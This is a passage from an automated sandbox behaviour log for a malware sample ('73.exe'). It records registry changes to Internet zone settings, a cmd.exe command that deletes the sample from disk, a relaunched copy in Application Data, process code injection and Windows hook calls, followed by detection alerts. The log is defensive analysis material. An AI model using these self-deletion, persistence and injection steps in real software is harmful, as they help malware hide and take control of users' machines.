40927.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40928.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40929.        regkey:
40930.          timestamp: 48429
40931.          mode: setval
40932.          sequenceNumber: 164
40933.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
40934.           processinfo:
40935.             pid: 364
40936.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40937.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40938.         mutex:
40939.           timestamp: 48434
40940.           sequenceNumber: 165
40941.           value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
40942.           processinfo:
40943.             pid: 364
40944.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40945.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40946.         mutex:
40947.           timestamp: 48437
40948.           sequenceNumber: 166
40949.           value: \BaseNamedObjects\ZonesLockedCacheCounterMutex
40950.           processinfo:
40951.             pid: 364
40952.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40953.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40954.         regkey:
40955.           timestamp: 48440
40956.           mode: setval
40957.           sequenceNumber: 167
40958.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
40959.          processinfo:
40960.            pid: 364
40961.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40962.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40963.        regkey:
40964.          timestamp: 48445
40965.          mode: setval
40966.          sequenceNumber: 168
40967.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
40968.           processinfo:
40969.             pid: 364
40970.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40971.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40972.         regkey:
40973.           timestamp: 48450
40974.           mode: setval
40975.           sequenceNumber: 169
40976.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
40977.          processinfo:
40978.            pid: 364
40979.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40981.        regkey:
40982.          timestamp: 48455
40983.          mode: setval
40984.          sequenceNumber: 170
40985.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
40986.           processinfo:
40987.             pid: 364
40988.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40989.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40990.         regkey:
40991.           timestamp: 48459
40992.           mode: added
40993.           sequenceNumber: 171
40994.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
40995.           processinfo:
40996.             pid: 364
40997.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40998.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40999.         regkey:
41000.           timestamp: 48463
41001.           mode: setval
41002.           sequenceNumber: 172
41003.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Internet Files
41004.          processinfo:
41005.            pid: 364
41006.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41007.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41008.        regkey:
41009.          timestamp: 48468
41010.          mode: added
41011.          sequenceNumber: 173
41012.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
41013.          processinfo:
41014.            pid: 364
41015.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41016.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41017.        folder:
41018.          timestamp: 48474
41019.          mode: open
41020.          sequenceNumber: 174
41021.          value: C:\Documents and Settings\admin\Cookies
41022.          processinfo:
41023.            pid: 364
41024.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41026.          ntstatus: 0x0
41027.          CreateOptions: 0x200000
41028.        regkey:
41029.          timestamp: 48469
41030.          mode: added
41031.          sequenceNumber: 175
41032.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
41033.          processinfo:
41034.            pid: 364
41035.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41036.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41037.        regkey:
41038.          timestamp: 48469
41039.          mode: setval
41040.          sequenceNumber: 176
41041.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cookies" = C:\Documents and Settings\admin\Cookies
41042.           processinfo:
41043.             pid: 364
41044.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41045.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41046.         process:
41047.           timestamp: 48524
41048.           mode: started
41049.           sequenceNumber: 177
41050.           value: C:\WINDOWS\system32\cmd.exe
41051.           pid: 1420
41052.           ppid: 364
41053.           parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41054.           cmdline: "C:\WINDOWS\system32\cmd.exe" /c DEL C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
41055.           filesize: 389120
41056.           md5sum: 6d778e0f95447e6546553eeea709d03c
41057.           sha1sum: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
41058.             ads:
41059.           fid (ads:): 844424930139260
41060.         apicall:
41061.           timestamp: 48530
41062.           sequenceNumber: 178
41063.           processinfo:
41064.             pid: 364
41065.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41066.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41067.           dllname: kernel32.dll
41068.           apiname: GetSystemDirectoryW
41069.           address: 0x755dd323
41070.           params:
41071.             param (id:1): 0x12faec
41072.             param (id:2): 261
41073.         apicall:
41074.           timestamp: 48534
41075.           sequenceNumber: 179
41076.           processinfo:
41077.             pid: 364
41078.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41079.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41080.           dllname: kernel32.dll
41081.           apiname: GetSystemDirectoryW
41082.           address: 0x755dd323
41083.           params:
41084.             param (id:1): 0x12faec
41085.             param (id:2): 261
41086.         mutex:
41087.           timestamp: 48535
41088.           sequenceNumber: 180
41089.           value: \BaseNamedObjects\VideoRenderer
41090.           processinfo:
41091.             pid: 364
41092.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41093.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41094.         mutex:
41095.           timestamp: 48579
41096.           sequenceNumber: 181
41097.           value: \BaseNamedObjects\SHIMLIB_LOG_MUTEX
41098.           processinfo:
41099.             pid: 1420
41100.             imagepath: C:\WINDOWS\system32\cmd.exe
41101.             md5sum: 6d778e0f95447e6546553eeea709d03c
41102.         regkey:
41103.           timestamp: 48586
41104.           mode: added
41105.           sequenceNumber: 182
41106.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio
41107.           processinfo:
41108.             pid: 1420
41109.             imagepath: C:\WINDOWS\system32\cmd.exe
41110.             md5sum: 6d778e0f95447e6546553eeea709d03c
41111.         regkey:
41112.           timestamp: 48619
41113.           mode: added
41114.           sequenceNumber: 183
41115.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
41116.           processinfo:
41117.             pid: 1420
41118.             imagepath: C:\WINDOWS\system32\cmd.exe
41119.             md5sum: 6d778e0f95447e6546553eeea709d03c
41120.         process:
41121.           timestamp: 48643
41122.           mode: terminated
41123.           sequenceNumber: 184
41124.           value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41125.           pid: 364
41126.           ppid: 1824
41127.           parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41128.           cmdline: N/A
41129.             ads:
41130.           fid (ads:): 3096224743826754
41131.         regkey:
41132.           timestamp: 48646
41133.           mode: added
41134.           sequenceNumber: 185
41135.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
41136.           processinfo:
41137.             pid: 1420
41138.             imagepath: C:\WINDOWS\system32\cmd.exe
41139.             md5sum: 6d778e0f95447e6546553eeea709d03c
41140.         regkey:
41141.           timestamp: 48649
41142.           mode: added
41143.           sequenceNumber: 186
41144.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
41145.           processinfo:
41146.             pid: 1420
41147.             imagepath: C:\WINDOWS\system32\cmd.exe
41148.             md5sum: 6d778e0f95447e6546553eeea709d03c
41149.         regkey:
41150.           timestamp: 48649
41151.           mode: added
41152.           sequenceNumber: 187
41153.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
41154.           processinfo:
41155.             pid: 1420
41156.             imagepath: C:\WINDOWS\system32\cmd.exe
41157.             md5sum: 6d778e0f95447e6546553eeea709d03c
41158.         regkey:
41159.           randomized: true
41160.           mode: queryvalue
41161.           sequenceNumber: 188
41162.           timestamp: 48669
41163.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
41164.          processinfo:
41165.            pid: 1420
41166.            imagepath: C:\WINDOWS\system32\cmd.exe
41167.            md5sum: 6d778e0f95447e6546553eeea709d03c
41168.        file:
41169.          timestamp: 48682
41170.          mode: delete
41171.          sequenceNumber: 189
41172.          value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
41173.          filesize: 364544
41174.          md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41175.          sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
41176.          processinfo:
41177.            tainted: true
41178.            pid: 1420
41179.            imagepath: C:\WINDOWS\system32\cmd.exe
41180.            md5sum: 6d778e0f95447e6546553eeea709d03c
41181.            ads:
41182.          fid (ads:): 3096224743826754
41183.          ntstatus: 0x0
41184.          CreateOptions: 0x0
41185.          PE:
41186.            InspectionType: Ext
41187.        malicious-alert:
41188.          classtype: Self-Delete
41189.          weight: 0
41190.          ruleid: 1712 : Self deletion using batch file ; Process deleting itself using a batch file
41191.          msg: Process deleting itself using a batch file
41192.          display-msg: Self deletion using batch file
41193.        malicious-alert:
41194.          classtype: misc-anom
41195.          weight: 100
41196.          ruleid: 10111 : Suspicious Code Injection ; Suspicious Self Code Injection
41197.          msg: Suspicious Self Code Injection
41198.          display-msg: Suspicious Code Injection
41199.        malicious-alert:
41200.          classtype: Self-Delete
41201.          weight: 0
41202.          ruleid: 1701 : Root process deleted ; Process deleting itself
41203.          msg: Process deleting itself
41204.          display-msg: Root process deleted
41205.        process:
41206.          timestamp: 48697
41207.          mode: terminated
41208.          sequenceNumber: 190
41209.          value: C:\WINDOWS\system32\cmd.exe
41210.          pid: 1420
41211.          ppid: 364
41212.          parentname: C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
41213.          cmdline: N/A
41214.            ads:
41215.          fid (ads:): 844424930139260
41216.        process:
41217.          timestamp: 49469
41218.          mode: started
41219.          sequenceNumber: 191
41220.          value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41221.          pid: 1056
41222.          ppid: 800
41223.          parentname: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41224.          cmdline: "C:\Documents and Settings\admin\Application Data\xedlc-a.exe"
41225.          filesize: 364544
41226.          md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41227.          sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
41228.            ads:
41229.          fid (ads:): 1407374883609148
41230.        codeinjection:
41231.          timestamp: 49489
41232.          suppressed: false
41233.          mode: create process suspended memory write code injection
41234.          sequenceNumber: 192
41235.          source:
41236.            tainted: true
41237.            processinfo:
41238.              pid: 800
41239.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41240.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41241.          target:
41242.            tainted: true
41243.            processinfo:
41244.              pid: 1056
41245.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41246.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41247.        process:
41248.          timestamp: 49493
41249.          mode: terminated
41250.          sequenceNumber: 193
41251.          value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41252.          pid: 800
41253.          ppid: 364
41254.          parentname: C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
41255.          cmdline: N/A
41256.            ads:
41257.          fid (ads:): 1407374883609148
41258.        file:
41259.          timestamp: 49505
41260.          mode: failed
41261.          sequenceNumber: 194
41262.          value: C:\Documents and Settings\admin\Application Data\LPK.DLL
41263.          processinfo:
41264.            tainted: true
41265.            pid: 1056
41266.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41267.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41268.            ads:
41269.          fid (ads:): 0
41270.          failure: open
41271.          ntstatus: 0xc0000034
41272.          CreateOptions: 0x200000
41273.          PE:
41274.            InspectionType: Ext
41275.        file:
41276.          timestamp: 49512
41277.          mode: failed
41278.          sequenceNumber: 195
41279.          value: C:\Documents and Settings\admin\Application Data\USP10.dll
41280.          processinfo:
41281.            tainted: true
41282.            pid: 1056
41283.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41284.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41285.            ads:
41286.          fid (ads:): 0
41287.          failure: open
41288.          ntstatus: 0xc0000034
41289.          CreateOptions: 0x200000
41290.          PE:
41291.            InspectionType: Ext
41292.        process:
41293.          timestamp: 49542
41294.          mode: duplicate_opened
41295.          sequenceNumber: 196
41296.          desiredaccess: 0x00000000
41297.          ntstatus: 0x00000000
41298.          target:
41299.            processinfo:
41300.              pid: 1056
41301.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41302.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41303.          duplicate_source:
41304.            processinfo:
41305.              pid: 1056
41306.              tid: 0
41307.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41308.          duplicate_target:
41309.            processinfo:
41310.              pid: 1056
41311.              tid: 0
41312.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41313.          InheritHandle: 0x00000000
41314.          Options: 0x00000002
41315.          source:
41316.            processinfo:
41317.              pid: 1056
41318.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41319.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41320.        regkey:
41321.          timestamp: 49557
41322.          mode: added
41323.          sequenceNumber: 197
41324.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
41325.          processinfo:
41326.            pid: 1056
41327.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41328.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41329.        regkey:
41330.          randomized: true
41331.          mode: queryvalue
41332.          sequenceNumber: 198
41333.          timestamp: 49564
41334.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
41335.           processinfo:
41336.             pid: 1056
41337.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41338.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41339.         regkey:
41340.           timestamp: 49575
41341.           mode: added
41342.           sequenceNumber: 199
41343.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
41344.           processinfo:
41345.             pid: 1056
41346.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41347.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41348.         regkey:
41349.           timestamp: 49579
41350.           mode: added
41351.           sequenceNumber: 200
41352.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
41353.           processinfo:
41354.             pid: 1056
41355.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41356.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41357.         regkey:
41358.           timestamp: 49583
41359.           mode: setval
41360.           sequenceNumber: 201
41361.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
41362.          processinfo:
41363.            pid: 1056
41364.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41366.        apicall:
41367.          timestamp: 49583
41368.          sequenceNumber: 202
41369.          processinfo:
41370.            pid: 1056
41371.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41372.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41373.          dllname: kernel32.dll
41374.          apiname: Sleep
41375.          address: 0x0042207d
41376.          params:
41377.            param (id:1): 15
41378.        apicall:
41379.          timestamp: 49591
41380.          sequenceNumber: 203
41381.          processinfo:
41382.            pid: 1056
41383.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41384.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41385.          dllname: kernel32.dll
41386.          apiname: Sleep
41387.          address: 0x0042207d
41388.          params:
41389.            param (id:1): 15
41390.        apicall:
41391.          timestamp: 49608
41392.          sequenceNumber: 204
41393.          processinfo:
41394.            pid: 1056
41395.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41396.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41397.          dllname: kernel32.dll
41398.          apiname: Sleep
41399.          address: 0x0042207d
41400.          params:
41401.            param (id:1): 15
41402.        apicall:
41403.          timestamp: 49622
41404.          sequenceNumber: 205
41405.          processinfo:
41406.            pid: 1056
41407.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41408.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41409.          dllname: kernel32.dll
41410.          apiname: Sleep
41411.          address: 0x0042207d
41412.          params:
41413.            param (id:1): 15
41414.        apicall:
41415.          timestamp: 49637
41416.          sequenceNumber: 206
41417.          processinfo:
41418.            pid: 1056
41419.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41420.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41421.          dllname: kernel32.dll
41422.          apiname: Sleep
41423.          address: 0x0042207d
41424.          params:
41425.            param (id:1): 15
41426.        apicall:
41427.          timestamp: 49652
41428.          sequenceNumber: 207
41429.          processinfo:
41430.            pid: 1056
41431.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41432.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41433.          dllname: kernel32.dll
41434.          apiname: Sleep
41435.          address: 0x0042207d
41436.          params:
41437.            param (id:1): 15
41438.        apicall:
41439.          timestamp: 49669
41440.          sequenceNumber: 208
41441.          processinfo:
41442.            pid: 1056
41443.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41444.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41445.          dllname: kernel32.dll
41446.          apiname: Sleep
41447.          address: 0x0042207d
41448.          params:
41449.            param (id:1): 15
41450.        apicall:
41451.          timestamp: 49684
41452.          sequenceNumber: 209
41453.          processinfo:
41454.            pid: 1056
41455.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41456.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41457.          dllname: kernel32.dll
41458.          apiname: Sleep
41459.          address: 0x0042207d
41460.          params:
41461.            param (id:1): 15
41462.        apicall:
41463.          timestamp: 49699
41464.          sequenceNumber: 210
41465.          processinfo:
41466.            pid: 1056
41467.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41469.          dllname: kernel32.dll
41470.          apiname: Sleep
41471.          address: 0x0042207d
41472.          params:
41473.            param (id:1): 15
41474.        file:
41475.          timestamp: 49717
41476.          mode: failed
41477.          sequenceNumber: 211
41478.          value: C:\Documents and Settings\admin\Application Data\CLBCATQ.DLL
41479.          processinfo:
41480.            tainted: true
41481.            pid: 1056
41482.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41483.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41484.            ads:
41485.          fid (ads:): 0
41486.          failure: open
41487.          ntstatus: 0xc0000034
41488.          CreateOptions: 0x200000
41489.          PE:
41490.            InspectionType: Ext
41491.        file:
41492.          timestamp: 49723
41493.          mode: failed
41494.          sequenceNumber: 212
41495.          value: C:\Documents and Settings\admin\Application Data\COMRes.dll
41496.          processinfo:
41497.            tainted: true
41498.            pid: 1056
41499.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41501.            ads:
41502.          fid (ads:): 0
41503.          failure: open
41504.          ntstatus: 0xc0000034
41505.          CreateOptions: 0x200000
41506.          PE:
41507.            InspectionType: Ext
41508.        apicall:
41509.          timestamp: 49727
41510.          sequenceNumber: 213
41511.          processinfo:
41512.            pid: 1056
41513.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41514.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41515.          dllname: kernel32.dll
41516.          apiname: GetSystemDirectoryW
41517.          address: 0x76fd7ee4
41518.          params:
41519.            param (id:1): 0x77043650
41520.            param (id:2): 261
41521.        mutex:
41522.          timestamp: 49736
41523.          sequenceNumber: 214
41524.          value: \BaseNamedObjects\AMResourceMutex2
41525.          processinfo:
41526.            pid: 1056
41527.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41528.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41529.        mutex:
41530.          timestamp: 49739
41531.          sequenceNumber: 215
41532.          value: \BaseNamedObjects\VideoRenderer
41533.          processinfo:
41534.            pid: 1056
41535.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41537.        apicall:
41538.          timestamp: 49743
41539.          sequenceNumber: 216
41540.          processinfo:
41541.            pid: 1056
41542.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41543.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41544.          dllname: kernel32.dll
41545.          apiname: GetSystemDirectoryA
41546.          address: 0x74723c7f
41547.          params:
41548.            param (id:1): 0xd3f568
41549.            param (id:2): 261
41550.        apicall:
41551.          timestamp: 49748
41552.          sequenceNumber: 217
41553.          processinfo:
41554.            pid: 1056
41555.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41556.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41557.          dllname: kernel32.dll
41558.          apiname: GetSystemDirectoryA
41559.          address: 0x74723c7f
41560.          params:
41561.            param (id:1): 0xd3f570
41562.            param (id:2): 261
41563.        mutex:
41564.          timestamp: 49753
41565.          sequenceNumber: 218
41566.          value: \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
41567.          processinfo:
41568.            pid: 1056
41569.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41570.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41571.        mutex:
41572.          timestamp: 49757
41573.          sequenceNumber: 219
41574.          value: \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
41575.          processinfo:
41576.            pid: 1056
41577.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41579.        mutex:
41580.          timestamp: 49761
41581.          sequenceNumber: 220
41582.          value: \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
41583.          processinfo:
41584.            pid: 1056
41585.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41586.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41587.        mutex:
41588.          timestamp: 49765
41589.          sequenceNumber: 221
41590.          value: \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
41591.          processinfo:
41592.            pid: 1056
41593.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41595.        mutex:
41596.          timestamp: 49769
41597.          sequenceNumber: 222
41598.          value: \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
41599.          processinfo:
41600.            pid: 1056
41601.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41602.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41603.        apicall:
41604.          timestamp: 49769
41605.          sequenceNumber: 223
41606.          processinfo:
41607.            pid: 1056
41608.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41610.          dllname: kernel32.dll
41611.          apiname: GetSystemDirectoryA
41612.          address: 0x74723c7f
41613.          params:
41614.            param (id:1): 0xd3f4bc
41615.            param (id:2): 261
41616.        mutex:
41617.          timestamp: 49782
41618.          sequenceNumber: 224
41619.          value: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-1409082233-688789844-725345543-1003MUTEX.DefaultS-1-5-21-1409082233-688789844-725345543-1003
41620.          processinfo:
41621.            pid: 1056
41622.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41624.        apicall:
41625.          timestamp: 49787
41626.          sequenceNumber: 225
41627.          processinfo:
41628.            pid: 1056
41629.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41630.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41631.          dllname: user32.dll
41632.          apiname: SetWindowsHookExA
41633.          address: 0x7473097c
41634.          params:
41635.            param (id:1): 2
41636.            param (id:2): 0x747307c3
41637.            param (id:3): 0x74720000
41638.            param (id:4): 684
41639.        apicall:
41640.          timestamp: 49791
41641.          sequenceNumber: 226
41642.          processinfo:
41643.            pid: 1056
41644.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41646.          dllname: user32.dll
41647.          apiname: SetWindowsHookExA
41648.          address: 0x7473099a
41649.          params:
41650.            param (id:1): 7
41651.            param (id:2): 0x747304cd
41652.            param (id:3): 0x74720000
41653.            param (id:4): 684
41654.        apicall:
41655.          timestamp: 49797
41656.          sequenceNumber: 227
41657.          processinfo:
41658.            pid: 1056
41659.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41660.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41661.          dllname: kernel32.dll
41662.          apiname: GetSystemDirectoryW
41663.          address: 0x763982be
41664.          params:
41665.            param (id:1): 0xd3ef98
41666.            param (id:2): 260
41667.        apicall:
41668.          timestamp: 49803
41669.          sequenceNumber: 228
41670.          processinfo:
41671.            pid: 1056
41672.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41673.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41674.          dllname: kernel32.dll
41675.          apiname: GetSystemDirectoryW
41676.          address: 0x763982be
41677.          params:
41678.            param (id:1): 0xd3f548
41679.            param (id:2): 260
41680.        apicall:
41681.          timestamp: 49810
41682.          sequenceNumber: 229
41683.          processinfo:
41684.            pid: 1056
41685.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41686.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41687.          dllname: kernel32.dll
41688.          apiname: GetSystemDirectoryA
41689.          address: 0x755dd289
41690.          params:
41691.            param (id:1): 0xd3eb8c
41692.            param (id:2): 261
41693.        apicall:
41694.          timestamp: 49814
41695.          sequenceNumber: 230
41696.          processinfo:
41697.            pid: 1056
41698.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
41699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
41700.          dllname: kernel32.dll
41701.          apiname: GetSystemDirectoryA
41702.          address: 0x755dd289
41703.          params:
41704.            param (id:1): 0xd3f630
